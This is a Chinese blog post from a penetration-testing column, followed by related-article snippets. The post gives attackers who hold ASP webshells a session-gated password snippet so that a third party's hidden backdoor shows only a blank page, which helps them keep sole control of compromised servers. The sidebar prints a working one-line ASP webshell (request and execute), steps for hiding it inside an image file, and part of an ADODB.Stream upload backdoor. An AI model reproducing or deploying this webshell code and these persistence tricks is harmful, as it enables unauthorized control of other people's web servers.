防止asp马后门

最新推荐文章于 2024-04-22 21:09:49 发布
最新推荐文章于 2024-04-22 21:09:49 发布
阅读量721 收藏
点赞数
分类专栏: 渗透测试
好多朋友都拿的有webshell吧,基本上都加了密的... 


可是,没见到源码,很难测试它到底有没有后门, 指不定给别人打工了... 


下面贴种很简单的方法,大家别扔蛋哈 (asp的哦) 


在代码的最前面插入: 


<%if request("xxx")="123" then session("xxx")="123" 
if session("xxx")<>"123" then ()%> 


就这么简单, 登webshell时别忘了在webshell地址后面加   ?xxx=123 


XXX 和 123 可以随便替换的 


这样...就算加后门的人知道了后门地址和密码,打开它时也只是个空白的网页 
绅士V
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
搭建web服务器asp网站传
xxxMIng的博客
12-28 3261
第一步 搭建web服务器 即 iis 必须先挂载系统ISO镜像文件 点下一步 安装 稍等片刻 即可安装成功 点下一步 安装 稍等片刻 即可安装成功   将asp网站源码 复制到 C:\Inetpub\wwwroot\asp       第二步 搭建asp网站 打开 IIS 管理器 将web服务扩展中所有扩展 全部调成允许 网站依靠 IP 端口 域名 ...
ASP后门 不加密的大
11-10
总的来说,ASP后门是一种强调安全性的Web后门工具,但使用时仍需谨慎,尤其是在不加密的情况下,必须采取额外的安全措施以防止潜在的安全风险。同时,访问指定网站www.whrbar.com下载更多资源的行为应审慎,...
揭密如何写ASP后门
番薯道长的博客
11-13 2439
正常的: EnD fUNCtION  IF SEssIoN("web2a2dmin")"" TheN  iF REquesT.foRM("pass")=uSERPASS Then  SEsSIoN("web2a2dmin")=uSERPAss  rESPOnsE.rEdirEct Url  ELse  rrs"对不起,密码验证失败!" 加有万能密码的: EnD fUNCtION  IF 
一句话图片的制作
热门推荐
qq_43817824的博客
07-26 1万+
第一种方法 我把图片命名为1.jpg 接下来写一句话木 新建一个2.asp文件,写入一句话木 <%Y=request("xindong")%> <%execute(Y)%> 然后在win+R,cmd,cd到原始图片的目录路径下 copy 1.jpg/b+2.asp/a 3.jpg 桌面上出现新的图片就是制作出的图片 第二种方法 通过工具C32将一句话木...
WEB攻防-ASP安全-ASP后门植入连接
最新发布
weixin_45534587的博客
04-22 591
创建一个文本文件,输入一句话木b,然后另存为ANSI编码。使用winhex打开刚创建的文本文件,将光标定位到首位,选择编辑-->粘贴0字节,添加2个字节。提交后文本被过滤了,所以菜刀无法连接,需要使用其他方法绕过过滤。将添加的两个字节改为FFFE, 保存再打开该文件,就完成了转码。会被执行解析,所以当进行访问时,会直接以asp的形式进行执行。根据asp被执行的特性,就可以使用菜刀执行连接了。┼攠數畣整爠煥敵瑳∨慡≡┩戾。配置启用父路径和主页指向。
webshell大asp,jsp,php)
weixin_56537388的博客
08-29 1038
可以在Windows Server虚拟机中搭建,具体的搭建步骤网上很多教程,这里不再赘述,这里主要演示asp的效果:上传asp,将大放到IIS服务器的根目录。注意,要复现ASPX文件的大,需要.NET环境,所以在搭建IIS服务器的时候,我们需要勾上上面的那些,使用大AspxSpy2014Final.aspx。需要搭建Tomcat环境,才能执行jsp文件。Tomcat环境配置教程网上有,也可以参考我这篇文章:Tomcat配置。登录之后,就可以看到功能界面了,这里演示cmd操作。
ASP后门之终极伪装
...::: X.U.S.T :::...
11-14 2025
申明:本文已刊登于《黑客X档案》2004年9期,转载请注明。---------------------------  记得当年asp出来的时候号称"永不被杀的木",呵呵,时至今日,随便什么杀毒软件都能将其杀得片甲不留^_^呵呵,受到木换壳躲避杀毒软件思路影响,我们也可以给asp"加壳"(呵呵,当然不是用UPX等)。还等什么?请往下看。  其实这个思路很简单,就是把asp代码编码,执行时
asp免杀的
04-23
对于网站管理员来说,以下是一些防止ASP入侵的措施: 1. **保持系统更新**:定期更新服务器操作系统和应用程序,修复已知的安全漏洞。 2. **严格权限管理**:限制不必要的脚本执行权限,避免任意文件上传功能...
ASP的著名大转成COM
01-27
"大"(Big Mal)通常指的是一个功能强大的后门程序,黑客利用它可以在受感染的服务器上执行任意命令,进行非法活动。在网络安全领域,将这种大转换为COM组件(Component Object Model)是为了更好地隐藏和控制...
2016年免杀asp.提权防删
11-02
同时,“防删除功能”意味着木会有一些措施防止自身被管理员或其他安全工具删除,例如自我复制或者在被删除后自动恢复。 “免杀asp.asp”这个文件名表明这就是木的主要组件,一个ASP脚本文件,很可能包含了...
asp检测tools
05-07
1. 扫描:该工具会自动遍历网站目录下的所有ASP文件,使用预定义的规则库来查找可能的恶意代码模式,如常见的后门函数、可疑的URL重定向、数据库连接泄露等。 2. 分析:一旦检测到潜在的木特征,工具会分析代码...
暗组经典asp webshell(去后门)
01-30
暗组经典asp webshell(去后门),已经成功去后门,暗组的webshell功能强大。 本人亲测,不信的可用数据抓包查看。
2020最新超级asp(自用)
04-19
2020最新超级asp-
我的ASP后门
04-09
我的ASPX后门!大家看看!
2012创建不死asp
10-04
2012创建不死asp
ASP(渗透网站)
05-25
作用不错,可以上传下载文件,可以检测补丁,可以进行server-u提权,可以执行cmd命令,可以隐藏小
asp文件加后门
04-29 1871
代码: a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h
Asp介绍
Jim的博客
09-15 4545
最近草泥这款最新版的Asp很热门,主流大的提权功能,信息收集功能,以及木隐藏功能都十分不错。 "星外主机提权"、“华众主机提权”、“N点主机提权”、“新网主机提权”
全面详尽剖析一句话asp
[智能天空教程区 Smart-sky]
05-15 2060
文章作者:冷月孤枫                                       所谓一句话插,就是通过向服务端提交一句简短的代码来达到向服务器插入木并最终获得webshell的方法。它分为一句话asp、一句话php……,本文就一句话asp来做一次详尽的剖析。在此首先要感谢前辈们的探究!一:基础篇首先我们看一下最常用的一句话木客户端的代码一句话客户端body {    
ASP后门程序:黑色界面版
"一款asp程序,具备黑色界面,包含后门功能,有版权声明,主要用于文件操作。" 在ASP(Active Server Pages)编程环境中,木是一种恶意脚本,通常被黑客用来非法获取服务器权限,执行非法操作。这款名为"黑色...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值